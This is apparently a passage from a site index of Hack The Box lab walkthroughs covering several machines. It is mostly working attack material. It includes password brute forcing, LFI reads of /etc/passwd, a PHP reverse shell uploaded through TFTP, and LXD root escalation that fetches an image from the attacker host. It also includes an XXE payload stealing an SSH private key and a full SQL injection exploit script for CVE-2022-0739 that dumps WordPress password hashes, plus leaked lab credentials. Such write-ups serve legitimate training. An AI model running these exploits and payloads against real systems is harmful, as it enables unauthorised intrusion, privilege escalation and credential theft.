    Now we can enumerate socket connections with the command \"ss\"

    ss -tl\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n

    Results:

    State  Recv-Q Send-Q Local Address:Port       Peer Address:PortProcess \nLISTEN 0      4096   127.0.0.53%lo:domain          0.0.0.0:*           \nLISTEN 0      128          0.0.0.0:ssh             0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:postgresql      0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:33599           0.0.0.0:*           \nLISTEN 0      32                 *:ftp                   *:*           \nLISTEN 0      128             [::]:ssh                [::]:* \n

    postgresql is in use. Since our user is not in the sudoers file and can not install a postgres client, we can bypass this situation via port forwarding.

    If the tool is not installed, then run in the atacker machine:

    sudo apt install postgresql-client-common\n

    1. In the attacking machine:

    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n

    2. In another terminal in the attacking machine:

    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n

    Once logged in, use postgresql cheat sheet to get the flag.

    ","tags":["walkthrough","postgresql","ftp"]},{"location":"htb-ignition/","title":"Ignition, a Hack The Box Machine","text":"
    nmap -sC -sV $ip -Pn\n

    Adding ignition.htb to /etc/hosts

    Enumerating:

    dir -u http://ignition.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -t 40\n

    Browsing found files and gathering information:

    /home                 (Status: 200) [Size: 25802]\n/contact              (Status: 200) [Size: 28673]\n/media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]\n/0                    (Status: 200) [Size: 25803]\n/static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]\n/catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]\n/admin                (Status: 200) [Size: 7095]\n/Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]\n/setup                (Status: 301) [Size: 185] [--> http://ignition.htb/setup/]\n/checkout             (Status: 302) [Size: 0] [--> http://ignition.htb/checkout/cart/]\n/robots               (Status: 200) [Size: 1]\n/wishlist             (Status: 302) [Size: 0] [--> http://ignition.htb/customer/account/login/referer/aHR0cDovL2lnbml0aW9uLmh0Yi93aXNobGlzdA%2C%2C/]    \n/soap                 (Status: 200) [Size: 391]\n

    Knowing this we could do a more precise enumeration with:

    gobuster dir -u http://ignition.htb -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/CMS/sitemap-magento.txt  \n

    From /admin we get to a login panel of a Magento application. From /setup we obtain the Magento version: Version dev-2.4-develop.

    Brute forcing it:

    wfuzz -c -z file,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt -d \"login%5Busername%5D=admin&login%5Bpassword%5D=FUZZ\" http://ignition.htb/admin\n

    Enter in /admin with credentials. Flag is in the dashboard.

    ","tags":["walkthrough"]},{"location":"htb-included/","title":"Included - A HackTheBox machine","text":"

    After running a port scan, the only open port is 80.

    nmap -sC -sV $ip -Pn -p-\n

    Results:

    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| http-title: Site doesn't have a title (text/html; charset=UTF-8).\n|_Requested resource was http://10.129.95.185/?file=home.php\n

    After visiting the site with the browser and examining its code, it's a simple web site. php is used. The endpoint that appears in the scanner has a LFI vulnerability and some files can be read.

    Burpsuite request:

    GET /?file=../../../../../../etc/passwd HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

    Result:

    HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:04:13 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 1575\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nmike:x:1000:1000:mike:/home/mike:/bin/bash\ntftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin\n

    Something interesting is that after user mike, there is a service/user: tftp. Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides. It is also revealed that TFTP uses the User Datagram Protocol (UDP) to communicate. This is defined as a lightweight data transport protocol that works on top of IP.

    UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out of order packets. It is implemented in the transport layer of the OSI Model, known as a fast but not reliable protocol, unlike TCP, which is reliable, but slower then UDP. Just like how TCP contains open ports for protocols such as HTTP, FTP, SSH and etcetera, the same way UDP has ports for protocols that work for UDP.

    sudo nmap -sU 10.129.95.185   \n

    You can use metasploit or python to check if can upload/download files. Module auxiliary/admin/tftp/tftp_transfer_util

    And also you can exploit it manually. Install tftp client:

    # Install tftp client\nsudo apet install tftp\n

    Also, check for manual and available commands:

    man tftp\n

    Upload your pentesmonkey shell with:

    put pentesmonkey.php\n

    Where does it get uploaded? Depends. But The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The directory is configured there under the parameter TFTP_DIRECTORY=. With that information, you can access the directory and from there launch your reverse shell.

    Let's do it. Request in Burpsuite:

    GET /?file=../../../../../../etc/default/tftpd-hpa HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

    Response:

    HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:27:32 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 125\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\n# /etc/default/tftpd-hpa\n\nTFTP_USERNAME=\"tftp\"\nTFTP_DIRECTORY=\"/var/lib/tftpboot\"\nTFTP_ADDRESS=\":69\"\nTFTP_OPTIONS=\"-s -l -c\"\n

    Now, open netcat on one terminal

    nc -lnvp 1234\n

    Launch your shell by visiting in the browser:

    http://10.129.95.185/?file=../../../../../..//var/lib/tftpboot/pentesmonkey.php\n

    Spawn a shell.

    SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

    Browse around. Credentials for user mike are at /var/wwww/html/.htpasswd:

    su mike\n# Enter password: Sheffield19\n

    And get the user.txt flag:

    cd\nls -la\ncat user.txt\n
    ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-included/#privilege-escalation","title":"Privilege escalation","text":"
    whoami\npwd\nid\ngroups\nuname -a\nlsb_release -a\n

    Information retrieved:

    uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)\ngroups\nmike lxd\nuname -a\nLinux included 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription:    Ubuntu 18.04.5 LTS\nRelease:        18.04\nCodename:       bionic\n

    After looking for \"exploit ubuntu 18.04.5 LTS\" there exists a exploit that uses lxd service, which makes sense after reading the information retrieved. About lxd privilege escalation.

    LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.

    Basically, as mike we belong to group lxd. Let's exploit this:

    Steps to be performed on the attacker machine:

    # Download build-alpine in your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild -alpine\u201d that will build the latest Alpine image as a compressed file, this step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start apache2 service.\n

    Steps to be performed on the victim machine:

    # Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AtackerIP//alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the container inside the /root directory\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Initialize the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n

    Now, we should be root:

    whoami\ncd /\nfind . -name root.txt 2>/dev/null\n
    ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-lame/","title":"HTB Lame","text":"
    # Reconnaissance\nnmap -sC -sV $IP -Pn\n
    PORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)\n|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\nService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h00m28s, deviation: 2h49m43s, median: 27s\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: lame\n|   NetBIOS computer name: \n|   Domain name: hackthebox.gr\n|   FQDN: lame.hackthebox.gr\n|_  System time: 2023-04-18T17:35:18-04:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 25444/tcp): CLEAN (Timeout)\n|   Check 2 (port 29825/tcp): CLEAN (Timeout)\n|   Check 3 (port 9648/udp): CLEAN (Timeout)\n|   Check 4 (port 21091/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n|_smb2-time: Protocol negotiation failed (SMB2)\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nRead data files from: /usr/bin/../share/nmap\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 69.50 seconds\n
    ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-lame/#enumeration","title":"Enumeration","text":"

    Samba smbd 3.0.20-Debian is vulnerable.

    smbclient -L \\\\$IP\n

    And enumerate shared resources:

    smbmap -H $IP\n
    [+] IP: 10.129.228.86:445       Name: unknown                                           \n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        tmp                                                     READ, WRITE     oh noes!\n        opt                                                     NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n

    tmp share has READ and WRITE permissions.

    msfconsole\nuse exploit/multi/samba/usermap_script\n# configure it and run it\n
    ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-markup/","title":"Markup - A HTB machine","text":"
    nmap -sC -A 10.129.95.192 -Pn \n

    Open ports: 22, 80 and 443.

    In the browser, there is a login panel. Try typical credentials. admin and password work.

    Locate the form to order an item. Capture the request with burp:

    POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 108\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><order><quantity>2</quantity><item>Home Appliances</item><address>1</address></order>\n

    Playing around with the request (for instance, nesting some xml) you can check that it's possible to escape the xml tags. This request contains a xml external entity XEE vulnerability.

    From some responses like the one below (and also from nmap scanning) you know that server runs on a windows:

    :  DOMDocument::loadXML(): Opening and ending tag mismatch: order line 1 and item in Entity, line: 1 in <b>C:\\xampp\\htdocs\\process.php\n

    Also, from source code you know there might be a user called daniel:

    As part of a possible exploitation we could try to check if there are ssh private key saved in that user's folder.

    POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 182\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>\n<order><quantity>2</quantity><item>\n&test;\n</item><address>1</address></order>\n

    The response will be id_rsa private key. More about XEE attacks.

    Now, as port 22 was open:

    ssh -i id_rsa daniel@10.129.95.192\n

    user.txt is in Desktop.

    ","tags":["walkthrough","windows","xxe"]},{"location":"htb-metatwo/","title":"Walkthrough - Metatwo, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#about-the-machine","title":"About the machine","text":"data Machine Metatwo Platform Hackthebox url link creator Naute OS Linux Release data 29 october 2022 Difficulty Easy Points 20 ip 10.10.11.186","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

    Run:

    export ip=10.10.11.186\n
    ","tags":["walkthrough"]},{"location":"htb-metatwo/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#active-scanning-serviceport-enumeration","title":"Active Scanning: Service/Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS, and traceroute. General enumeration not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

    PORT   STATE SERVICE\n21/tcp open  ftp\n22/tcp open  ssh\n80/tcp open  http\n

    Open 10.10.11.186 in the browser. A redirection to http://metapress.htb occurs, but the server is not found. So we add this routing in our /etc/hosts file:

    Open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n

    Move the cursor to the end and add these lines:

    10.10.11.186    metapress.htb\n

    Now we can visit the site. The first thing we notice is that it is a WordPress. That means we can use a tool such as wpscan to enumerate resources in the target. As we desire also to know the installed plugins, we will perform an aggressive scan with the flag --plugins-detection.

    First, do the generic scan:

    wpscan --url http://metapress.htb\n

    Results:

    _______________________________________________________________\n         __          _______   _____\n         \\ \\        / /  __ \\ / ____|\n          \\ \\  /\\  / /| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\/  \\/ / |  ___/ \\___ \\ / __|/ _` | '_ \\\n            \\  /\\  /  | |     ____) | (__| (_| | | | |\n             \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.22\n       Sponsored by Automattic - https://automattic.com/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http://metapress.htb/ [10.10.11.186]\n[+] Started: Sun Nov 13 14:58:36 2022\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entries:\n |  - Server: nginx/1.18.0\n |  - X-Powered-By: PHP/8.0.24\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] robots.txt found: http://metapress.htb/robots.txt\n | Interesting Entries:\n |  - /wp-admin/\n |  - /wp-admin/admin-ajax.php\n | Found By: Robots Txt (Aggressive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http://codex.wordpress.org/XML-RPC_Pingback_API\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/\n |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/\n\n[+] WordPress readme found: http://metapress.htb/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https://www.iplocation.net/defend-wordpress-from-ddos\n |  - https://github.com/wpscanteam/wpscan/issues/1299\n\n[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).\n | Found By: Rss Generator (Passive Detection)\n |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http://metapress.htb/wp-content/themes/twentytwentyone/\n | Last Updated: 2022-11-02T00:00:00.000Z\n | Readme: http://metapress.htb/wpcontent/themes/twentytwentyone/readme.txt\n | [!] The version is out of date, the latest version is 1.7\n | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1\n | Style Name: Twenty Twenty-One\n | Style URI: https://wordpress.org/themes/twentytwentyone/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...\n | Author: the WordPress team\n | Author URI: https://wordpress.org/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:11 <========================================================> (137 / 137) 100.00% Time: 00:00:11\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n

    Two interesting facts that may come into use later are:

    • WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
    • X-Powered-By: PHP/8.0.24

    So, we have a WordPress version 5.6.2 that is using a PHP version 8.0.24.

    After this, use the aggressive method to scan plugins:

    wpscan --url http://metapress.htb --enumerate vp --plugins-detection aggressive\n

    Since this method is really slow, we have some spare time to have a look at the html code with the inspector tool in our browser. This specific line catches our attention:

    <link rel=\"stylesheet\" id=\"bookingpress_fonts_css-css\" href=\"http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/fonts/fonts.css?ver=1.0.10\" media=\"all\">\n

    Sweet. In a very easy way, we've been able to spot an installed plugin and its version: bookingpress version 1.0.10. If we browse the site it's easy to get to http://metapress.htb/events/. Bookingpress plugin version 1.0.10 is vulnerable, so next step will be exploitation.

    ","tags":["walkthrough"]},{"location":"htb-metatwo/#initial-access","title":"Initial access","text":"

    By searching for \"bookingpress 1.0.10\" in google, we can learn that there is a critical vulnerability associated with the plugin BookingPress version under 1.0.11.

    Description of CVE-2022-0739: The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

    We are going to exploit the vulnerability in three different ways:

    • Using a python script.
    • Using the curl command.
    • Using a capture in Burp Suite.

    We will leave out of this write-up the tool sqlmap, that authomatizes the attack. Let's get dirty hands with code.

    Python script There is a git repo that exploits CVE-2022-0739.

    Let's see the python script:

    import requests\nfrom json import loads\nfrom random import randint\nfrom argparse import ArgumentParser\n\np = ArgumentParser()\np.add_argument('-u', '--url', dest='url', help='URL of wordpress server with vulnerable plugin (http://example.domain)', required=True)\np.add_argument('-n', '--nonce', dest='nonce', help='Nonce that you got as unauthenticated user', required=True)\n\ntrigger = \") UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -\"\ngainer = ') UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset {off}-- -'\n\n# Payload: ) AND ... -- - total(9)\ndef gen_payload(nonce, sqli_postfix, category_id=1):\n    return { \n        'action': 'bookingpress_front_get_category_services', # vulnerable action,\n        '_wpnonce': nonce,\n        'category_id': category_id,\n        'total_service': f'{randint(100, 10000)}{sqli_postfix}'\n    }\n\nif __name__ == '__main__':  \n    print('- BookingPress PoC')\n    i = 0\n    args = p.parse_args()\n    url, nonce = args.url, args.nonce\n    pool = requests.session()\n\n\n    # Check if the target is vulnerable\n    v_url = f'{url}/wp-admin/admin-ajax.php'\n    proof_payload = gen_payload(nonce, trigger)\n\n    res = pool.post(v_url, data=proof_payload)\n    try:\n        res = list(loads(res.text)[0].values())\n    except Exception as e:\n        print('-- Got junk... Plugin not vulnerable or nonce is incorrect')\n        exit(-1)\n    cnt = int(res[7])\n\n    # Capture hashes\n    print('-- Got db fingerprint: ', res[0])\n    print('-- Count of users: ', cnt)\n    for i in range(cnt):\n        try:\n            # Generate payload\n            user_payload = gen_payload(nonce, gainer.format(off=i))\n            u_data = list(loads(pool.post(v_url, user_payload).text)[0].values())\n            print(f'|{u_data[0]}|{u_data[1]}|{u_data[2]}|')\n        except: continue \n

    Create a python script called bookingpress.py and give it execution permission:

    sudo nano bookingpress.py\n# Now we paste the code and save changes with CTRL-X and Yes.\nchmod +x bookingpress.py\n

    Bookingpress.py requires two arguments. First is \"url\" and second in \"nonce\". Wpnonce is generated during the registration of an event in the browser. To obtain it, book a spot in the calendar and capture that with BurpSuite. Here is the traffic intercepted:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 95\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=akporp33a92q48gn0afe6akrkt\n\naction=bookingpress_front_get_timings&service_id=1&selected_date=2022-11-21&_wpnonce=f26ed88649\n

    Now execute the script:

    python bookingpress.py -u metapress.htb -n f26ed88649\n

    And results:

    - BookingPress PoC\n-- Got db fingerprint:  10.5.15-MariaDB-0+deb11u1\n-- Count of users:  2\n|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|\n|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|\n

    Curl command Also, we could use the following command:

    curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'\n

    If you use it, remember to change the value of the NONCE parameter. Mine was f26ed88649.

    Capturing the request with Burp

    First, capture a request for an appointment booking with Burp Suite:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1054\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_before_book_appointment&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=1&appointment_data[selected_service_name]=Startupmeeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0'-7502)+UNION+ALL+SELECT+group_concat(user_login),group_concat(user_pass),%40%40version_compile_os,1,2,3,4,5,6+from+wp_users--+-'&appointment_data[selected_date]=2022-11-15&appointment_data[selected_start_time]=10:00&appointment_data[selected_end_time]=10:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=lolo&appointment_data[customer_lastname]=lolo&appointment_data[customer_phone]=7777777777&appointment_data[customer_email]=lolo@lolo.com&appointment_data[appointment_note]=<script>alert(1)</script>&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=US&appointment_data[total_services]=&appointment_data[stime]=1668426666&appointment_data[spam_captcha]=In6ygQvJD9EB&_wpnonce=da775e35c6\n

    As you can see in the captured traffic, since I restarted my machine due to non related issues, my wpnonce has shifted from f26ed88649 to da775e35c6. Send this request to the Repeater module (CTRL-R) and play with it. After a while testing it, I could craft this request:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 112\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1;--+-'\n

    For that, we have this response:

